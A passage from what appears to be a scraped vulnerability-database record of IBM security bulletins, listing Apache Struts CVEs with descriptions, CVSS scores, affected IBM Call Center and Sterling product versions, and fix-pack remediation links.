\nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-7809](<https://vulners.com/cve/CVE-2014-7809>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by predictable tokens. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass cross-site request forgery security measures. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/98963](<https://exchange.xforce.ibmcloud.com/vulnerabilities/98963>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2011-5057](<https://vulners.com/cve/CVE-2011-5057>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to block access to the session map by the org.apache.struts2.interceptor.SessionAware or org.apache.struts2.interceptor.RequestAware interfaces. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to modify the session map. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/71654](<https://exchange.xforce.ibmcloud.com/vulnerabilities/71654>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4387](<https://vulners.com/cve/CVE-2012-4387>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an error when handling request parameters. A remote attacker could exploit this vulnerability using a specially-crafted parameter name containing an OGNL expression to consume all available CPU resources. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78183>) for the current score. 
\nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2012-1006](<https://vulners.com/cve/CVE-2012-1006>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the editPerson.action and struts2-rest-showcase/orders scripts. A remote attacker could exploit this vulnerability using the name, lastName or clientNape parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72888](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72888>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-0392](<https://vulners.com/cve/CVE-2012-0392>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to properly restrict access to static methods by the CookieInterceptor class. An attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72088](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72088>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0094](<https://vulners.com/cve/CVE-2014-0094>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in ParametersInterceptor. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server. 
\nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92205](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92205>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2019-0233](<https://vulners.com/cve/CVE-2019-0233>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by an access permission override when performing a file upload. By sending a specially crafted request, an attacker could exploit this vulnerability to cause subsequent upload actions to fail. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186699](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186699>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2013-1965](<https://vulners.com/cve/CVE-2013-1965>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error in the Apache Struts Showcase App. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary code on the system. \nCVSS Base score: 6.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85573](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85573>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2014-0112](<https://vulners.com/cve/CVE-2014-0112>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to ParametersInterceptor and the failure to restrict access to the class parameter. An attacker could exploit this vulnerability using the class parameter to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92740](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92740>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2134](<https://vulners.com/cve/CVE-2013-2134>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84762](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2016-3081](<https://vulners.com/cve/CVE-2016-3081>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 5.6 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112528](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2014-0113](<https://vulners.com/cve/CVE-2014-0113>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to CookieInterceptor and the failure to restrict access to the getClass() method. 
An attacker could exploit this vulnerability using CookieInterceptor when configured to accept all cookies to manipulate the ClassLoader used by the application server to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/92742](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92742>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2135](<https://vulners.com/cve/CVE-2013-2135>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by double evaluation error when evaluating parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84763](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2019-0230](<https://vulners.com/cve/CVE-2019-0230>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186702](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186702>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2013-4316](<https://vulners.com/cve/CVE-2013-4316>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87373](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n** CVEID: **[CVE-2012-0391](<https://vulners.com/cve/CVE-2012-0391>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by the interpretation of parameter values as OGNL expressions by the ExceptionDelegator command. An attacker could exploit this vulnerability using a specially-crafted parameter to execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72229](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72229>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2012-0393](<https://vulners.com/cve/CVE-2012-0393>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to traverse directories on the system, caused by the improper validation of input by ParameterInterceptor prior to being used to create files. An attacker could send a specially-crafted URL request containing directory traversal sequences to create or overwrite arbitrary files on the system. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/72089](<https://exchange.xforce.ibmcloud.com/vulnerabilities/72089>) for the current score. 
\nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2012-4386](<https://vulners.com/cve/CVE-2012-4386>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of the token name configuration parameter by the token handling mechanism. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed HTTP request to perform unauthorized actions. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/78182](<https://exchange.xforce.ibmcloud.com/vulnerabilities/78182>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2016-4003](<https://vulners.com/cve/CVE-2016-4003>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/111514](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2016-3093](<https://vulners.com/cve/CVE-2016-3093>) \n** DESCRIPTION: **Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. 
\nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/113686](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n** CVEID: **[CVE-2013-4310](<https://vulners.com/cve/CVE-2013-4310>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the action: parameter prefix. An attacker could exploit this vulnerability to gain unauthorized access to the system. \nCVSS Base score: 5.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/87336](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N) \n \n** CVEID: **[CVE-2014-0116](<https://vulners.com/cve/CVE-2014-0116>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the failure to properly restrict access to the getClass() method by the CookieInterceptor class. An attacker could exploit this vulnerability to manipulate the ClassLoader used by the application server. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/93024](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93024>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2010-1870](<https://vulners.com/cve/CVE-2010-1870>) \n** DESCRIPTION: **XWork, as used in Apache Struts, FishEye and Crucible, could allow a remote attacker to bypass security restrictions, caused by an error in the ParameterInterceptor class. An attacker could exploit this vulnerability using specially-crafted OGNL (Object-Graph Navigation Language) expressions to modify server-side objects and possibly execute arbitrary commands on the system. 
\nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/60371](<https://exchange.xforce.ibmcloud.com/vulnerabilities/60371>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2020-17530](<https://vulners.com/cve/CVE-2020-17530>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a forced double OGNL evaluation on raw user input in tag attributes. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192743](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192743>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2016-3082](<https://vulners.com/cve/CVE-2016-3082>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/112527](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2016-4436](<https://vulners.com/cve/CVE-2016-4436>) \n** DESCRIPTION: **An unspecified error in Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/114183](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2013-2251](<https://vulners.com/cve/CVE-2013-2251>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating the action:, redirect:, and redirectAction: parameters as OGNL (Object-Graph Navigation Language) expressions. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject and execute arbitrary commands on the system. Note: This vulnerability affects other products. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85756](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2017-12611](<https://vulners.com/cve/CVE-2017-12611>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of an unintentional expression in Freemarker tag instead of string literals. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/131603](<https://exchange.xforce.ibmcloud.com/vulnerabilities/131603>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2015-5209](<https://vulners.com/cve/CVE-2015-5209>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to gain unauthorized access to the system. An attacker could exploit this vulnerability using a special top-level object to manipulate internal settings and modify another user session. 
\nCVSS Base score: 9.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106695](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106695>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2013-2115](<https://vulners.com/cve/CVE-2013-2115>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by an incomplete fix for an error related to the handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to modify server-side objects and inject and execute arbitrary commands on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-1966](<https://vulners.com/cve/CVE-2013-1966>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper handling of the includeParams attribute. An attacker could exploit this vulnerability using a specially-crafted request parameter containing an OGNL expression to inject OGNL code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/84542](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n** CVEID: **[CVE-2013-2248](<https://vulners.com/cve/CVE-2013-2248>) \n** DESCRIPTION: **Apache Struts could allow a remote attacker to conduct phishing attacks, caused by an open redirect vulnerability in the DefaultActionMapper class. 
An attacker could exploit this vulnerability using the redirect: and redirectAction: parameters in a specially-crafted URL to redirect a victim to arbitrary Web sites. \nCVSS Base score: 4.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/85755](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score. \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n** CVEID: **[CVE-2015-2992](<https://vulners.com/cve/CVE-2015-2992>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when directly accessing JSP files. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/106172](<https://exchange.xforce.ibmcloud.com/vulnerabilities/106172>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2015-5169](<https://vulners.com/cve/CVE-2015-5169>) \n** DESCRIPTION: **Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input when debug mode is enabled. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/105879](<https://exchange.xforce.ibmcloud.com/vulnerabilities/105879>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Call Center for Commerce| 9.5.0 \nIBM Call Center for Commerce| 10.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Call Center version 10 and if you are running IBM Call Center version 9.5 a product upgrade must be completed first. IBM Call Center version 9.5 reached end of support April 30, 2022.\n\nCall Center installing Fix Pack 12 - <https://www.ibm.com/docs/en/call-center/10.0?topic=center-installing-fix-packs>\n\nFix Pack 12 download location - [https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-ISCCS-All-fp12-Installer&product=ibm%2FOther%20software%2FIBM%20Call%20Center%20for%20Commerce&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling&function=fixId&parent=ibm/Other%20software](<https://www.ibm.com/support/fixcentral/swg/selectFixes?fixids=10.0.0.0-Sterling-ISCCS-All-fp12-Installer&product=ibm%2FOther%20software%2FIBM%20Call%20Center%20for%20Commerce&source=dbluesearch&mhsrc=ibmsearch_a&mhq=10.0.0.0-Sterling&function=fixId&parent=ibm/Other%20software>)\n\nIBM Call Center release notes - <https://www.ibm.com/docs/en/call-center/10.0?topic=center-fixes-by-fix-pack-version#fp12>\n\nCreating & Extending Struts - <https://www.ibm.com/docs/en/order-management-sw/10.0?topic=cesf-creating-extending-struts-xml-file-in-web-ui-framework>\n\n## Workarounds and Mitigations\n\nIBM strongly recommends addressing the vulnerability now by upgrading to the latest fixpack that has the upgraded version of Apache Struts. Please note the fixpack only applies to IBM Call Center version 10 and if you are running IBM Call Center version 9.5 a product upgrade must be completed first. 
IBM Call Center version 9.5 reached end of support April 30, 2022.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T17:37:56", "type": "ibm", "title": "Security Bulletin: IBM Call Center and Apache Struts Struts upgrade strategy (various CVEs, see below)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1870", "CVE-2011-1772", "CVE-2011-5057", "CVE-2012-0391", "CVE-2012-0392", "CVE-2012-0393", "CVE-2012-0838", "CVE-2012-1006", "CVE-2012-4386", "CVE-2012-4387", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251", "CVE-2013-4310", "CVE-2013-4316", "CVE-2014-0094", "CVE-2014-0112", "CVE-2014-0113", "CVE-2014-0116", "CVE-2014-7809", "CVE-2015-2992", "CVE-2015-5169", "CVE-2015-5209", "CVE-2016-3081", "CVE-2016-3082", "CVE-2016-3093", "CVE-2016-4003", "CVE-2016-4436", "CVE-2017-12611", "CVE-2019-0230", "CVE-2019-0233", "CVE-2020-17530"], "modified": "2022-09-14T17:37:56", "id": "43ABDDEF8A51FB28FC8C4825BAD26A0A25F5F21805BFC87561A0AEABFD065F37", "href": "https://www.ibm.com/support/pages/node/6620351", "cvss": 
{"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-20T21:37:44", "description": "## Summary\n\nIBM Sterling Order Management and IBM Sterling Configure Price Quote use Apache Struts 2 and are affected by some of the vulnerabilities that exist in Apache Struts 2.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2013-4310_](<https://vulners.com/cve/CVE-2013-4310>)\n\n**Description:** \n \nApache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix. \n \nCVSS Base Score: 5.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/87336_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87336>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:N)\n\nCVEID: [_CVE-2013-4316_](<https://vulners.com/cve/CVE-2013-4316>)\n\n**DESCRIPTION: ** \n \nAn unspecified error in Apache Struts related to the default enabling of Dynamic Method Invocation (DMI) could lead to remote code execution.\n\nCVSS Base Score: 10 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/87373_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/87373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\nCVEID: [_CVE-2013-2251_](<https://vulners.com/cve/CVE-2013-2251>)\n\n**Description:** \n \nApache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix. 
\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85756_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85756>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-2248_](<https://vulners.com/cve/CVE-2013-2248>)\n\n**Description:** \n \nMultiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in a parameter using the (1) redirect: or (2) redirectAction: prefix.\n\nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85755_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85755>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n_ \n_CVEID: [_CVE-2013-2135_](<https://vulners.com/cve/CVE-2013-2135>)\n\n**Description:** \n \nApache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both \"${}\" and \"%{}\" sequences, which causes the OGNL code to be evaluated twice.\n\nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84763_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84763>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-2134_](<https://vulners.com/cve/CVE-2013-2134>)\n\n**Description:** \n \nApache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135. 
\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84762_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-2115_](<https://vulners.com/cve/CVE-2013-2115>)\n\n**Description:** \n \nApache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84543_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-1966_](<https://vulners.com/cve/CVE-2013-1966>)\n\n**Description:** \n \nApache Struts 2 before 2.3.14.1 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag.\n\n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/84542_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/84542>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n_ \n_CVEID: [_CVE-2013-1965_](<https://vulners.com/cve/CVE-2013-1965>) \n\n\n**Description:** \n \nApache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.1, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled 